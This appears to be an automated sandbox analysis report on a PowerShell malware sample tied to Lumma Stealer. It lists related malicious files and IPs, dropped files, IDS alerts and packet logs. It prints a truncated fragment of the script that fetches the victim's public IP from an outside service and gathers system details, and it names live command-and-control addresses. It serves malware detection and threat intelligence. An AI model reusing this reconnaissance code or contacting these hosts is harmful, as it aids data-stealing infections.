                                                                      2025 Q1 Staff Pay Adjustment-Handbook.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.18.11.207
                                                                      Attach2.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.18.11.207
                                                                      Attach1.htmGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.18.11.207
                                                                      2025 Q1 Staff Pay Adjustment-Handbook.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.18.10.207
                                                                      Final_Draft_with_without_Removal_Depreciation_Report.htmGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.18.10.207
                                                                      https://claiim-hadiaah4.resminiid.net/Get hashmaliciousUnknownBrowse
                                                                      • 104.18.10.207
                                                                      https://xsin.it/Pemenang-GiveawayGet hashmaliciousUnknownBrowse
                                                                      • 104.18.10.207
                                                                      GasTechnologyPartnership.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.18.11.207

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSoNvY66Z8jp.ps1Get hashmaliciousUnknownBrowse
                                                                      • 172.67.149.252
                                                                      Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                      • 104.26.12.205
                                                                      Kariny CV.vbsGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      Commercial Invoice Confirmation-1132346.vbsGet hashmaliciousUnknownBrowse
                                                                      • 104.21.16.1
                                                                      jjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 104.21.64.1
                                                                      Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                      • 104.22.74.216
                                                                      Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                      • 172.67.74.232
                                                                      Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                      • 104.18.27.193
                                                                      FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • 104.21.32.1
                                                                      Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                      • 104.18.27.193
                                                                      QUICKPACKETUSPmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                      • 185.211.7.193
                                                                      INVOICE-No96322.pdf.exeGet hashmaliciousRemcosBrowse
                                                                      • 185.213.83.33
                                                                      Bukti_Transfer...pdf.exeGet hashmaliciousRemcosBrowse
                                                                      • 185.213.83.33
                                                                      Hilix.sh4.elfGet hashmaliciousMiraiBrowse
                                                                      • 185.216.200.208
                                                                      SSA-2025.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 193.26.115.242
                                                                      https://www.v1.bgmi-event.freewebhostmost.com/Get hashmaliciousUnknownBrowse
                                                                      • 66.78.59.15
                                                                      https://v1.bgmi-event.freewebhostmost.com/Get hashmaliciousUnknownBrowse
                                                                      • 66.78.59.15
                                                                      nabspc.elfGet hashmaliciousUnknownBrowse
                                                                      • 104.166.110.66
                                                                      G1B8T38x7G.elfGet hashmaliciousUnknownBrowse
                                                                      • 203.159.95.7
                                                                      test.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                      • 167.88.173.11
                                                                      CLOUDFLARENETUSoNvY66Z8jp.ps1Get hashmaliciousUnknownBrowse
                                                                      • 172.67.149.252
                                                                      Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                      • 104.26.12.205
                                                                      Kariny CV.vbsGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      Commercial Invoice Confirmation-1132346.vbsGet hashmaliciousUnknownBrowse
                                                                      • 104.21.16.1
                                                                      jjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 104.21.64.1
                                                                      Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                      • 104.22.74.216
                                                                      Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                      • 172.67.74.232
                                                                      Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                      • 104.18.27.193
                                                                      FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • 104.21.32.1
                                                                      Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                      • 104.18.27.193
                                                                      ARTNET2PLoNvY66Z8jp.ps1Get hashmaliciousUnknownBrowse
                                                                      • 91.206.178.120
                                                                      Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                      • 91.206.178.120
                                                                      4Osfx7gnSx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 185.104.113.237
                                                                      fqJIOoSp5U.dllGet hashmaliciousUnknownBrowse
                                                                      • 91.206.178.125
                                                                      QZzvG5G6VE.exeGet hashmaliciousStealcBrowse
                                                                      • 91.206.178.118
                                                                      mrkjKujfkP.exeGet hashmaliciousStealcBrowse
                                                                      • 91.206.178.118
                                                                      vR19oQpY8c.exeGet hashmaliciousStealcBrowse
                                                                      • 91.206.178.118
                                                                      sql.tmp.dll.dllGet hashmaliciousUnknownBrowse
                                                                      • 91.206.178.125
                                                                      UrQrIdRfCg.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.104.112.62
                                                                      http://tldbonak.comGet hashmaliciousUnknownBrowse
                                                                      • 91.206.178.97

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      3b5074b1b5d032e5620f69f9f700ff0eoNvY66Z8jp.ps1Get hashmaliciousUnknownBrowse
                                                                      • 185.211.7.193
                                                                      Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                      • 185.211.7.193
                                                                      Commercial Invoice Confirmation-1132346.vbsGet hashmaliciousUnknownBrowse
                                                                      • 185.211.7.193
                                                                      jjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 185.211.7.193
                                                                      Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                      • 185.211.7.193
                                                                      Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                      • 185.211.7.193
                                                                      Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                      • 185.211.7.193
                                                                      FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • 185.211.7.193
                                                                      Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                      • 185.211.7.193
                                                                      Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                      • 185.211.7.193
                                                                      37f463bf4616ecd445d4a1937da06e19Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                      • 104.18.10.207
                                                                      Kariny CV.vbsGet hashmaliciousUnknownBrowse
                                                                      • 104.18.10.207
                                                                      nDHL_CUSTOM_CLEARANCE_FORM_3409249_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      • 104.18.10.207
                                                                      DHL AWB Document_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 104.18.10.207
                                                                      TxTPu961er.exeGet hashmaliciousAmadey, RedLine, StealcBrowse
                                                                      • 104.18.10.207
                                                                      Xw9oZv75Ze.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                      • 104.18.10.207
                                                                      hHtR1O06GH.exeGet hashmaliciousAmadey, Healer AV Disabler, LummaC Stealer, Stealc, VidarBrowse
                                                                      • 104.18.10.207
                                                                      #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f.exeGet hashmaliciousGhostRatBrowse
                                                                      • 104.18.10.207
                                                                      SecuriteInfo.com.Win32.Evo-gen.5457.19170.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • 104.18.10.207
                                                                      SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeGet hashmaliciousGuLoaderBrowse
                                                                      • 104.18.10.207

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\bootstrap.min[1].css

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with very long lines (65371)
                                                                      Category:dropped
                                                                      Size (bytes):121200
                                                                      Entropy (8bit):5.0982146191887106
                                                                      Encrypted:false
                                                                      SSDEEP:768:Vy3Gxw/Vc/QWlJxtQOIuiHlq5mzI4X8OAduFKbv2ctg2Bd8JP7ecQVvH1FS:nw/a1fIuiHlq5mN8lDbNmPbh
                                                                      MD5:EC3BB52A00E176A7181D454DFFAEA219
                                                                      SHA1:6527D8BF3E1E9368BAB8C7B60F56BC01FA3AFD68
                                                                      SHA-256:F75E846CC83BD11432F4B1E21A45F31BC85283D11D372F7B19ACCD1BF6A2635C
                                                                      SHA-512:E8C5DAF01EAE68ED7C1E277A6E544C7AD108A0FA877FB531D6D9F2210769B7DA88E4E002C7B0BE3B72154EBF7CBF01A795C8342CE2DAD368BD6351E956195F8B
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:/*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\analytics[1].js

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with very long lines (2343)
                                                                      Category:dropped
                                                                      Size (bytes):52916
                                                                      Entropy (8bit):5.51283890397623
                                                                      Encrypted:false
                                                                      SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                      MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                      SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                      SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                      SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\css[1].css

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):247
                                                                      Entropy (8bit):5.428842177231087
                                                                      Encrypted:false
                                                                      SSDEEP:6:0IFFm15+56ZRWHMVgjWizlpdUD4uFl8vpAtCIif0RHC:jFMO6ZRoMYW6pSZE6tCrf0Ri
                                                                      MD5:F5DBA43B69C83A48868FECAD364B5B34
                                                                      SHA1:2A536D153CBBEA8037BE9B3DA5F2A51B6DCFB382
                                                                      SHA-256:4E05BF034F35EE0FD5263203A049263645F575B4846F721F667BEC6505362063
                                                                      SHA-512:F767C167FB7D60405558BFB15FB529DDC00C2E2169F8A938D5B7DC18DF4A4D51E4A4CCBD5EECC61732E592393676C288949F6048B526E78149280F226853DFAF
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: normal;. src: url(https://fonts.gstatic.com/l/font?kit=memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVY&skey=62c1cbfccc78b4b2&v=v40);.}.

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):2704
                                                                      Entropy (8bit):5.419927904741295
                                                                      Encrypted:false
                                                                      SSDEEP:48:AKYNSU4xympx4RfoUP7mZ9tK8NTXGiR80xnq7kkyUbaImx10ln0zJ6JAwqgt:AvkHxv/IwBZ2KTXGibdkyGaImM0d6JnZ
                                                                      MD5:830C9F7B963F69E7F20BB7ED1862A4B1
                                                                      SHA1:0471EE42E94AB40558AF342B903D2CC08FE1E8EE
                                                                      SHA-256:78FBDF70062F5163FBD56D49ED15FC2394DB6A646255DF1DD2038A56298D00BE
                                                                      SHA-512:F66519D1DDA0F2B4DDA4A7A02231C6ECDC800095A6FDFD44C4C85B76ACF5CFB30248BC49C26957D44026F7B55D13AA6522759349E31E5F36A5E83D859C2B0455
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:@...e................................................@..........X................$.....K.sG.<p..a.......Microsoft.Management.Infrastructure.CimCmdlets..H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerS

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5b2lbbjh.bkj.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aitlf142.kts.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mublfckf.cf0.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxtdj12p.hd2.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LTZ2YZJSYFZC13RQEOM5.temp

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6221
                                                                      Entropy (8bit):3.7355207156773638
                                                                      Encrypted:false
                                                                      SSDEEP:96:gNmyl133CxH5ekvhkvCCtuwQl6hLAHoBQl6hLAHoe:UR1yZKuwE6hL9BE6hL9e
                                                                      MD5:00706A35609BDB15AEA10311C06D333F
                                                                      SHA1:5492A6CDB297C15BA4E14F556116D567F8E70133
                                                                      SHA-256:C32845148A3129E246F55A9D90DCC8CB35DC6C775A2DF37A424A75007CE447B6
                                                                      SHA-512:50407C918A6B132A03705C2EDA11F758346B3C07B5F607C4E09037B6175F69B7433BA9C78B0904D82712523833770F4ED7DDC87F8B9B97405C556888A221C3FC
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....................t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^RZ.;...........................%..A.p.p.D.a.t.a...B.V.1.....RZ.;..Roaming.@......CW.^RZ.;..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DWO`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................%E..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6221
                                                                      Entropy (8bit):3.7355207156773638
                                                                      Encrypted:false
                                                                      SSDEEP:96:gNmyl133CxH5ekvhkvCCtuwQl6hLAHoBQl6hLAHoe:UR1yZKuwE6hL9BE6hL9e
                                                                      MD5:00706A35609BDB15AEA10311C06D333F
                                                                      SHA1:5492A6CDB297C15BA4E14F556116D567F8E70133
                                                                      SHA-256:C32845148A3129E246F55A9D90DCC8CB35DC6C775A2DF37A424A75007CE447B6
                                                                      SHA-512:50407C918A6B132A03705C2EDA11F758346B3C07B5F607C4E09037B6175F69B7433BA9C78B0904D82712523833770F4ED7DDC87F8B9B97405C556888A221C3FC
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....................t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^RZ.;...........................%..A.p.p.D.a.t.a...B.V.1.....RZ.;..Roaming.@......CW.^RZ.;..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DWO`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................%E..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                      Static File Info

                                                                      General

                                                                      File type:ASCII text, with very long lines (706), with no line terminators
                                                                      Entropy (8bit):5.390306751239133
                                                                      TrID:
                                                                        File name:XkgoE6Yb52.ps1
                                                                        File size:706 bytes
                                                                        MD5:ec5ea6c135974c85204bd38525329e5b
                                                                        SHA1:131f8dfd360bf7fffbbff91f264f0664c72b724c
                                                                        SHA256:042d6a65c72d16cd9c89ee8cf62b3477edb045ec16c83e22038d1b05a55fa635
                                                                        SHA512:d04af0ceacd0a65ceb0a2c666e52442bba2d05e2960ca08a35b8eb4cac55470e587a2d07cad5cee071e53a748c67bdbf68f15fa4795fa1874176405b87cf2880
                                                                        SSDEEP:12:WVBuiG3wEQ2aHWj25ioWAR+wpbZ6l/6gLhYdGHAyG35+tmvy5hu1M4AGs6Y:BP3wEqHu25xxUlpLhNHAf3i5htORY
                                                                        TLSH:DB01C031B33C428583D5C860B4B9B712D0576B40A55EECFC76FC2001C7832E23DA0918
                                                                        File Content Preview:$randomNumber=Get-Random -Minimum 10000 -Maximum 99999; $ipAddress=(Invoke-WebRequest -Uri 'http://api.ipify.org').Content; $osVersion=[System.Environment]::OSVersion.VersionString; $memory=[math]::round((Get-CimInstance -ClassName Win32_ComputerSystem).T

                                                                        File Icon

                                                                        Icon Hash:3270d6baae77db44

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2025-02-18T08:29:03.230549+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449731104.26.13.20580TCP
                                                                        2025-02-18T08:29:05.575867+01002860232ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET)1192.168.2.44973291.206.178.1205001TCP
                                                                        2025-02-18T08:29:05.575867+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.44973291.206.178.1205001TCP
                                                                        2025-02-18T08:29:05.588539+01002860233ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation)191.206.178.1205001192.168.2.449732TCP
                                                                        2025-02-18T08:29:06.738323+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449733185.211.7.193443TCP
                                                                        2025-02-18T08:29:06.738323+01002021697ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious1192.168.2.449733185.211.7.193443TCP
                                                                        2025-02-18T08:29:08.328516+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.44973791.206.178.1205001TCP
                                                                        2025-02-18T08:29:08.328516+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44973791.206.178.1205001TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Feb 18, 2025 08:29:02.706986904 CET4973180192.168.2.4104.26.13.205
                                                                        Feb 18, 2025 08:29:02.712068081 CET8049731104.26.13.205192.168.2.4
                                                                        Feb 18, 2025 08:29:02.712131977 CET4973180192.168.2.4104.26.13.205
                                                                        Feb 18, 2025 08:29:02.713057995 CET4973180192.168.2.4104.26.13.205
                                                                        Feb 18, 2025 08:29:02.718343973 CET8049731104.26.13.205192.168.2.4
                                                                        Feb 18, 2025 08:29:03.178155899 CET8049731104.26.13.205192.168.2.4
                                                                        Feb 18, 2025 08:29:03.230549097 CET4973180192.168.2.4104.26.13.205
                                                                        Feb 18, 2025 08:29:04.337913036 CET497325001192.168.2.491.206.178.120
                                                                        Feb 18, 2025 08:29:04.342819929 CET50014973291.206.178.120192.168.2.4
                                                                        Feb 18, 2025 08:29:04.342904091 CET497325001192.168.2.491.206.178.120
                                                                        Feb 18, 2025 08:29:04.343100071 CET497325001192.168.2.491.206.178.120
                                                                        Feb 18, 2025 08:29:04.347887993 CET50014973291.206.178.120192.168.2.4
                                                                        Feb 18, 2025 08:29:05.565612078 CET50014973291.206.178.120192.168.2.4
                                                                        Feb 18, 2025 08:29:05.575752974 CET50014973291.206.178.120192.168.2.4
                                                                        Feb 18, 2025 08:29:05.575790882 CET50014973291.206.178.120192.168.2.4
                                                                        Feb 18, 2025 08:29:05.575866938 CET497325001192.168.2.491.206.178.120
                                                                        Feb 18, 2025 08:29:05.582719088 CET497325001192.168.2.491.206.178.120
                                                                        Feb 18, 2025 08:29:05.588538885 CET50014973291.206.178.120192.168.2.4
                                                                        Feb 18, 2025 08:29:05.635808945 CET49733443192.168.2.4185.211.7.193
                                                                        Feb 18, 2025 08:29:05.635875940 CET44349733185.211.7.193192.168.2.4
                                                                        Feb 18, 2025 08:29:05.636018991 CET49733443192.168.2.4185.211.7.193
                                                                        Feb 18, 2025 08:29:05.650166035 CET49733443192.168.2.4185.211.7.193
                                                                        Feb 18, 2025 08:29:05.650207996 CET44349733185.211.7.193192.168.2.4
                                                                        Feb 18, 2025 08:29:06.354219913 CET44349733185.211.7.193192.168.2.4
                                                                        Feb 18, 2025 08:29:06.354335070 CET49733443192.168.2.4185.211.7.193
                                                                        Feb 18, 2025 08:29:06.358551025 CET49733443192.168.2.4185.211.7.193
                                                                        Feb 18, 2025 08:29:06.358567953 CET44349733185.211.7.193192.168.2.4
                                                                        Feb 18, 2025 08:29:06.358896017 CET44349733185.211.7.193192.168.2.4
                                                                        Feb 18, 2025 08:29:06.402477026 CET49733443192.168.2.4185.211.7.193
                                                                        Feb 18, 2025 08:29:06.530739069 CET49733443192.168.2.4185.211.7.193
                                                                        Feb 18, 2025 08:29:06.575340986 CET44349733185.211.7.193192.168.2.4
                                                                        Feb 18, 2025 08:29:06.738331079 CET44349733185.211.7.193192.168.2.4
                                                                        Feb 18, 2025 08:29:06.738367081 CET44349733185.211.7.193192.168.2.4
